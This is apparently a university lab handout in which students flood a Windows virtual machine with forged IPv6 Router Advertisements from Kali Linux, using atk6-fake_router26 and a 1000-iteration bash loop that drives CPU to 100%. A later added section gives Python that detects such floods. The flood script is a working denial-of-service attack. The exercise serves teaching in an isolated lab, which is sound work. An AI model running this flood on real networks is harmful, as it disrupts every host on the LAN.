CNIT 123 Project 7: Windows DoS with IPv6 Router Advertisement Packets (10 pts.)

What You Need

Protecting a Windows Host

If you are using a Windows host machine running VMware, your host will suffer from this attack.

To protect the host machine, open an Administrator Command Prompt and execute this command:

netsh interface ipv6 set interface "Ethernet" routerdiscovery=disabled

However, do NOT execute that command on the Windows 2008 Server virtual machine you are attacking before starting this project.

Use NAT Networking

Set both virtual machines to use NAT networking. That protects the other machines in the room from this attack.

Start the Windows Machine

Start the Windows machine and log in.

Open a Command Prompt and execute the IPCONFIG command. You should see an IPv6 address starting with fe80::, as shown below on this page:

Sending a Single Router Advertisement Packet

On your Kali Linux machine, in a Terminal window, execute this command:

atk6-fake_router26 -A 1::/64 -n 1 eth0

This sends a single Router Advertisement to every machine on your LAN. All modern operating systems will join that network in a process called SLAAC (Stateless Address Autoconfiguration).

Observing the SLAAC Address

On the Windows machine, in a Command Prompt, execute the IPCONFIG command.

You should see an IPv6 address starting with 1:, as shown below on this page:

Open Task Manager

Click on your Windows desktop to make it active. Then press Ctrl+Shift+Esc.

Task Manager opens. Click the Performance tab to show the CPU usage. The usage should be near 0%, as shown below.

Making a Simple Flood Tool

On your Kali Linux machine, in a Terminal window, execute this command:

nano flood

In the nano window, type or paste in this script, which sends 1000 Router Advertisement packets.

#!/bin/bash
# Send one Router Advertisement per iteration, each advertising a different /64 prefix
for i in {1..1000}
do
    atk6-fake_router26 -A 1:$i::/64 -n 1 eth0
done

Type Ctrl+X, Y, Enter to save your script.

On your Kali Linux machine, in the Terminal window, execute these commands:

chmod a+x flood

./flood

Observing CPU Usage on the Windows Machine

Look at the Windows desktop. The CPU usage should be 100%, as shown below.

Observing the SLAAC Addresses on the Windows Machine

On the Windows machine, in a Command Prompt, execute the IPCONFIG command.

You should see many IPv6 addresses starting with 1:, as shown below on this page:
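
A defender's view of the flood above, as an added example that is not part of the original project: this Python code parses ICMPv6 Router Advertisement bodies (RFC 4861), extracts their Prefix Information options, and alerts when more distinct prefixes appear within a time window than a real router would advertise. The function names, the 10-second window, the 16-prefix threshold and the sample packets are assumptions constructed for illustration.

```python
import ipaddress
import struct

ICMPV6_RA = 134          # Router Advertisement (RFC 4861)
OPT_PREFIX_INFO = 3      # Prefix Information option

def ra_prefixes(icmp6: bytes):
    """Return the prefixes carried in one ICMPv6 Router Advertisement body."""
    if len(icmp6) < 16 or icmp6[0] != ICMPV6_RA:
        return []
    found, off = [], 16                     # options follow the 16-byte RA header
    while off + 2 <= len(icmp6):
        opt_type, opt_len = icmp6[off], icmp6[off + 1] * 8   # length is in 8-byte units
        if opt_len == 0 or off + opt_len > len(icmp6):
            break                           # malformed option: stop parsing
        if opt_type == OPT_PREFIX_INFO and opt_len == 32 and icmp6[off + 2] <= 128:
            addr = ipaddress.IPv6Address(icmp6[off + 16:off + 32])
            found.append(ipaddress.IPv6Network((addr, icmp6[off + 2]), strict=False))
        off += opt_len
    return found

def flood_alerts(events, window=10.0, max_prefixes=16):
    """events: (timestamp, icmp6_bytes) in time order. Return the timestamps at which the
    count of distinct prefixes seen in the last `window` seconds first exceeds max_prefixes."""
    recent, alerts, alarmed = [], [], False
    for ts, pkt in events:
        recent += [(ts, p) for p in ra_prefixes(pkt)]
        recent = [(t, p) for t, p in recent if ts - t <= window]
        over = len({p for _, p in recent}) > max_prefixes
        if over and not alarmed:
            alerts.append(ts)               # alert once per flood, not once per packet
        alarmed = over
    return alerts

def sample_ra(prefix: str) -> bytes:
    """Constructed test input: RA body with one Prefix Information option (checksum left 0)."""
    net = ipaddress.IPv6Network(prefix)
    header = struct.pack("!BBHBBHII", ICMPV6_RA, 0, 0, 64, 0, 1800, 0, 0)
    option = struct.pack("!BBBBIII", OPT_PREFIX_INFO, 4, net.prefixlen, 0xC0, 86400, 14400, 0)
    return header + option + net.network_address.packed

# Constructed traffic: one benign RA, then 1000 RAs with prefixes 1:1::/64 .. 1:1000::/64
# (the prefix pattern of the flood script above), 5 ms apart (the spacing is an assumption).
benign = [(0.0, sample_ra("2001:db8:1::/64"))]
flood = [(60.0 + i * 0.005, sample_ra(f"1:{i}::/64")) for i in range(1, 1001)]

if __name__ == "__main__":
    print("benign alerts:", flood_alerts(benign))
    print("flood alerts:", flood_alerts(benign + flood))
```

A single legitimate advertisement produces no alert, while the constructed flood trips the threshold on its 17th distinct prefix.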

Saving the Image

Save a screen image showing many IPv6 addresses. Give it a filename of Proj 7 from YOUR NAME.

Turning In Your Project

Email the image to cnit.123@gmail.com with a subject line of Proj 7 from YOUR NAME.


Last modified 9-24-15